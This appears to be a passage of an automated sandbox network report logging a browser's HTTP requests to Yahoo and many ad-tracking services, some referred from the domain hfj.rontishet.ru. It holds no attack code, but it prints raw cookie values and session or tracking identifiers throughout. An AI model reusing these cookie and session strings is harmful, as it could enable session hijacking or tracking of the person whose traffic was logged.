Source: global trafficHTTP traffic detected: GET /sync/google/demand?sync=1&gdpr=0&gdpr_consent= HTTP/1.1Host: eb2.3lift.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://eb2.3lift.com/sync?us_privacy=1YNN&gpp=DBAA&gpp_sid=-1&&ld=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sync=CgoIoQEQw-zNn6QyCgoI4gEQw-zNn6QyCgoI5gEQw-zNn6QyCgoIhwIQw-zNn6QyCgkIOhDD7M2fpDIKCQgbEMPszZ-kMgoKCIwCEMPszZ-kMgoKCKwCEMPszZ-kMgoKCK0CEMPszZ-kMgoJCF8Qw-zNn6Qy; tluidp=3811239664715375770435; tluid=3811239664715375770435
Source: global trafficHTTP traffic detected: GET /ebda?sync=1&gdpr=0&gdpr_consent= HTTP/1.1Host: eb2.3lift.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://eb2.3lift.com/sync?us_privacy=1YNN&gpp=DBAA&gpp_sid=-1&&ld=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: tluidp=3811239664715375770435; tluid=3811239664715375770435
Source: global trafficHTTP traffic detected: GET /track/cmf/openx?oxid=89da3b4d-4019-3a17-5e17-79a012d51d47&gdpr=0 HTTP/1.1Host: match.adsrvr.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://u.openx.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: TDID=07c89b85-4c1c-424d-8df0-0123ed6cebb6; TDCPM=CAESFgoHc3Z4OXQ1MBILCOb3lfnK37A9EAUYBSABKAIyCwiYwNik4d-wPRAFOAE.
Source: global trafficHTTP traffic detected: GET /track/cmf/generic?ttd_pid=yieldmo&ttd_tpi=1&ttd_puid=VRLAoLL__uL1ewyIa5Iq HTTP/1.1Host: match.adsrvr.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ads.yieldmo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: TDID=07c89b85-4c1c-424d-8df0-0123ed6cebb6; TDCPM=CAESFgoHc3Z4OXQ1MBILCOb3lfnK37A9EAUYBSABKAIyCwiYwNik4d-wPRAFOAE.
Source: global trafficHTTP traffic detected: GET /AdServer/ImgSync?p=160648&gdpr=&gdpr_consent=&pu=https%3A%2F%2Fimage4.pubmatic.com%2FAdServer%2FSPug%3Fp%3D160648%26pmc%3DPM_PMC%26pr%3Dhttps%253A%252F%252Fsync-pm.ads.yieldmo.com%252Fsync%253Fpn_id%253Dpub%2526id%253D%2523PMUID%2526gdpr%253DPM_GDPR%2526gdpr_consent%253DPM_CONSENT HTTP/1.1Host: image8.pubmatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ads.yieldmo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sync/triplelift/3811239664715375770435?gdpr=0&gdpr_consent= HTTP/1.1Host: pr-bh.ybp.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://eb2.3lift.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383
Source: global trafficHTTP traffic detected: GET /pixel?google_nid=openx&google_hm=YTViNWU4ODctODk2ZS02NGIzLTRiZjctMjMxOWQ4MzdkMzI3 HTTP/1.1Host: cm.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://u.openx.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkUkNwMMgJ6QEXcNmBLe89FRWkxDD1qfpDAQyrRUH_QfzDefzbvv9fnUjUM9uM
Source: global trafficHTTP traffic detected: GET /pixel?google_nid=openx&google_cm&google_sc HTTP/1.1Host: cm.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://u.openx.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkUkNwMMgJ6QEXcNmBLe89FRWkxDD1qfpDAQyrRUH_QfzDefzbvv9fnUjUM9uM
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/1exjVpdKZ.RKQhQMvgY39Q--~B/Zmk9c3RyaW07aD0xNTY7dz0zMDA7YXBwaWQ9eXRhY2h5b24-/https://s.yimg.com/os/creatr-uploaded-images/2023-09/e0cf9c30-5ee8-11ee-af7e-5e30c1880d05.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/irocQ7vdF0Cre0047_F2BA--~B/Zmk9c3RyaW07aD0xNTY7dz0zMDA7YXBwaWQ9eXRhY2h5b24-/https://s.yimg.com/os/creatr-uploaded-images/2024-09/1ab9b3e0-7f4a-11ef-9bc8-98e2d97b2d54.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/Wzs19jFHdMDc_wAXtX4KnQ--~B/Zmk9c3RyaW07aD0xNTY7dz0zMDA7YXBwaWQ9eXRhY2h5b24-/https://s.yimg.com/os/creatr-uploaded-images/2024-09/7e34b8e0-7778-11ef-b5fd-d718d88a3d1b.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/1IAUDYdOSONDSm2DkprmEA--~B/Zmk9c3RyaW07aD0xNTY7dz0zMDA7YXBwaWQ9eXRhY2h5b24-/https://s.yimg.com/os/creatr-uploaded-images/2024-09/7d21b410-7f40-11ef-b77e-dea3714d1b2e.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sync?nid=13&gdpr=0&gdpr_consent=&gpp=DBAA&gpp_sid= HTTP/1.1Host: sync.srv.stackadapt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://eb2.3lift.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/BdrXtbFtdHZFBGTr4iYGaQ--~B/Zmk9c3RyaW07aD0xNTY7dz0zMDA7YXBwaWQ9eXRhY2h5b24-/https://s.yimg.com/os/creatr-uploaded-images/2021-01/8fcd9e10-4e8b-11eb-9fdf-5bd1b68e439b.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sync?nid=20&gdpr=0&gdpr_consent=&gpp=DBAA&gpp_sid= HTTP/1.1Host: sync.srv.stackadapt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://eb2.3lift.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /yahoo-home/log/3/social?route=US:CH:V&tvi50=9540&lti=trecs&ri=7d4b7c70a92f79780beeda5b53de66fb&sd=v2_180b7abcdacfe26a5edf97d1d328e529_27eb735b-f48b-4088-80a5-78ec8c9435df-tuctdf46380_1727716864_1727716864_CIi3jgYQm9teGIXczJ-kMiABKAEw4QE4kaQOQNWmD0jZiNcDUPUDWABgAGiOuMvY8NrPu1twAYABAA&ui=27eb735b-f48b-4088-80a5-78ec8c9435df-tuctdf46380&pi=/&wi=-2162821594718986386&pt=home&vi=1727716863493&st=social-available&d=%7B%22data%22%3A%5B%7B%22i%22%3A%22ctx%22%2C%22ism%22%3Afalse%2C%22srx%22%3A1280%2C%22sry%22%3A1024%2C%22pd%22%3Anull%2C%22tpl%22%3A%22%22%2C%22url%22%3A%22https%3A%2F%2Fwww.yahoo.com%22%2C%22rref%22%3A%22https%3A%2F%2Fhfj.rontishet.ru%2F%22%2C%22sref%22%3A%22https%3A%2F%2Fhfj.rontishet.ru%2F%22%2C%22hdl%22%3A%22Yahoo%20%7C%20Mail%2C%20Weather%2C%20Search%2C%20Politics%2C%20News%2C%20Finance%2C%20Sports%20%26%20Videos%22%2C%22sec%22%3A%22%22%2C%22aut%22%3A%5B%5D%2C%22img%22%3A%22https%3A%2F%2Fs.yimg.com%2Fcv%2Fapiv2%2Fsocial%2Fimages%2Fyahoo_default_logo.png%22%2C%22v%22%3A15%2C%22pw%22%3Afalse%7D%5D%7D&tim=13%3A21%3A17.296&id=5725&llvl=2&cv=20240929-12-RELEASE& HTTP/1.1Host: ch-trc-events.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: taboola_session_id=v2_180b7abcdacfe26a5edf97d1d328e529_27eb735b-f48b-4088-80a5-78ec8c9435df-tuctdf46380_1727716864_1727716866_CIi3jgYQm9teGIXczJ-kMiABKAEw4QE4kaQOQNWmD0jZiNcDUPUDWABgAGiOuMvY8NrPu1twAYABAA; receive-cookie-deprecation=1; t_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; t_pt_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383
Source: global trafficHTTP traffic detected: GET /track/cmf/generic?ttd_pid=rightmedia&gdpr=0&gdpr_consent=&gpp=DBAA&gpp_sid=-1 HTTP/1.1Host: match.adsrvr.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: TDID=07c89b85-4c1c-424d-8df0-0123ed6cebb6; TDCPM=CAESFgoHc3Z4OXQ1MBILCOb3lfnK37A9EAUYBSABKAIyCwiYwNik4d-wPRAFOAE.
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/7Z0aKacGGhmhPwsBUl2i5A--~B/Zmk9c3RyaW07aD00MDg7dz03MjA7YXBwaWQ9eXRhY2h5b24-/https://s.yimg.com/os/creatr-uploaded-images/2024-09/a129e590-7f30-11ef-8ab3-79e7dd104b7f.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /p2?c1=2&c2=7241469&c5=2023538075&c7=https%3A%2F%2Fwww.yahoo.com%2F&c14=-1&c8=Yahoo%20%7C%20Mail%2C%20Weather%2C%20Search%2C%20Politics%2C%20News%2C%20Finance%2C%20Sports%20%26%20Videos&c9=https%3A%2F%2Fhfj.rontishet.ru%2F&gdpr=0&gdpr_consent=&cs_ucfr=1&cs_fpdm=*null&cs_fpdt=*null&cs_fpid=ktb74Qf%2BB5a5JQqJGS%2Fbp0PG1iIU%2BWKGDEPE8YdWnT4%3D&cs_fpit=c&ns_c=UTF-8&ns__t=1727716870229 HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: UID=1DD20ed7f68597d26f3495f1727716881
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/Logo.BwBAfWlF.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /pcs/view?xai=AKAOjsvvMNSqw1BFHSA5usijRB-Vsz3bnqfYDc7UZv5g2M1sFWxBVqS71-rNodNGIMZdG8SPdiZyOB2kNL0M0GNqEKxt819Q3Vc-Ho-YUgVV5t5NEJSjM7Yws3fT1fSeNA28QAGQAfHfT7H5SRHn7l4CvTi9Y0IICmJXkzwF8krIMW7DficjgvBw5waVppCAKGra4gNlCLfJUlWCGqQwHtNDRbu559WZ7WEM8JuGncnFSDwnkr6AouaV5DzNMKPKOixcyhXc6FLvVnd0cElk6TjW1MLpORjczQA4vOT6djnunQ1qA6-vwHXXlIspTOBRVuYiswZc8WJ0ortTkxy4P-nsNxHpqZXmKuvjKNvdjmJDHDzTNIe5Z8Y31uFTrTp3gESvYX-8Zv5ksJ_dG38GIiV2_jTCl7azsgJS7nnSWvWHtpbgSBRdk_K8dcvrr5GWn6_mhzVKmxzsW4Q&sai=AMfl-YQdFh6gmzZikqfkjf5SYjbAVGt6bpY2K0oj4DB6-wIAgYUVKc3ojtWBmSmKtF5hAqFbaWxiXtpuCelbpa7GcFW13o4rNywwXCDH7MreKAa-TEipfSDljFqXlCmCrdK2_QlduE1Du3FgxMxej5nOIA&sig=Cg0ArKJSzG0mggn03aECEAE&uach_m=%5BUACH%5D&urlfix=1&adurl= HTTP/1.1Host: securepubads.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkUkNwMMgJ6QEXcNmBLe89FRWkxDD1qfpDAQyrRUH_QfzDefzbvv9fnUjUM9uM
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/Card.CXxu1kiL.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /pcs/view?xai=AKAOjsug8egTOGUwuTYAlodlMa48CAssbNcAn8-5CMYRD27hTy36B3X_5H06fbTuoS3YMlrVELcLYSKUvw7H_EweoXkg4rc4gvsT5gNspR6_dyq_WKdB1ksdy9nAYN5JvbtVxGy40XdAcFJRGpQ5XumgN0mHd6OylCbrGCzcJ91yBMvm63riUnOzKaVJv6BzsHd66eUsxXtM1xYGmFM-x2_Kkon_Hnpl9u1XlaSfoZi24BlcuJpTEktw6T4P0I1sc9Egkv_F2PUpeOlqvypzf5-vnBSKq4hudExqMWU-4xTw6A6yAI6a9MK9gmPpj4D7S2yEZPFpPIU0V3pHWfqN9WD95TsXTL3cnxNC50JHfqWGQq2IzaNjwHa5_Nwgt0yFD6KQCyacFXR7xdS6vyn_MswWWEtesIyBx0Oh1sG4bAM1CcRxJVs806rjCebVSTQ55hjG5NKJPcJoVw&sai=AMfl-YSAniHsbapwuTxa1z_0KgDODfL1ZHeEGs1tJkI2rwKGiMQYiU9C0LPXqx7pKZ4w9HJk_djYG9SeaENyKvDKrumr3Bd5yY4MxH2bcYbFK8OHuNziOT1YUjuuf7MLcJfYdMLTaF9w69ZJRv7q9kpjgQ&sig=Cg0ArKJSzAyQX4192yRaEAE&uach_m=%5BUACH%5D&urlfix=1&adurl= HTTP/1.1Host: securepubads.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkUkNwMMgJ6QEXcNmBLe89FRWkxDD1qfpDAQyrRUH_QfzDefzbvv9fnUjUM9uM
Source: global trafficHTTP traffic detected: GET /pcs/view?xai=AKAOjsuWTd_PBLn-J_pk3qyn0DUhbwh7iS414WxnYiM2JEmrzFdFYLUwdCG5WGg4lLwnB7WNLIewjBxfXCyLBAV4heikx-MDApQiMH0TOBB2hYcbNg7SYibUr_Akp1xRztuQVlGUGByyYf5jLNTyoaQ9GWn8xzWjxeORKO2R3ut6iBYxMYAY082c0URAKu2jVbeAWelFoukI-O1ZG1UhmLgW-236PWJ_Lyu_vEgCTKISBUEYlH_gH8XNsjAhQjOko-TuE3CEupev3r2yQ9oxRWJHsIdoSSBZ7SwpUNP-wDuYqJ9p6dfrzJjFfFNWN0JlQPW_rwxfG424fcGow2z33Yb16lE-jbCQ8REz6ib2MvLxZgn89FviVnyq1SeZiDJd12gIc1Tv2r-BbidfhgJvhlpHbvNlm3-1TgIiqf0PbUBQWNpeBkXHHguQsTT5ljhqHW_D2TA_L2RKt1JownLs&sai=AMfl-YRvlAWQcD0MoRX819XY2pml8BoYbC705QUUCn1mWE893hb-RjEifHTCIpt_Evs2OF8ls9npMJCUb9qiYhlWEK2E4vGa1Qo-ZUS5miTPnhBjObTZkD8EhjtZ-76jhF8ezjwbpTN2vmzcQmOHH8M3sA&sig=Cg0ArKJSzN7tOiNvAqq2EAE&uach_m=%5BUACH%5D&urlfix=1&adurl= HTTP/1.1Host: securepubads.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: 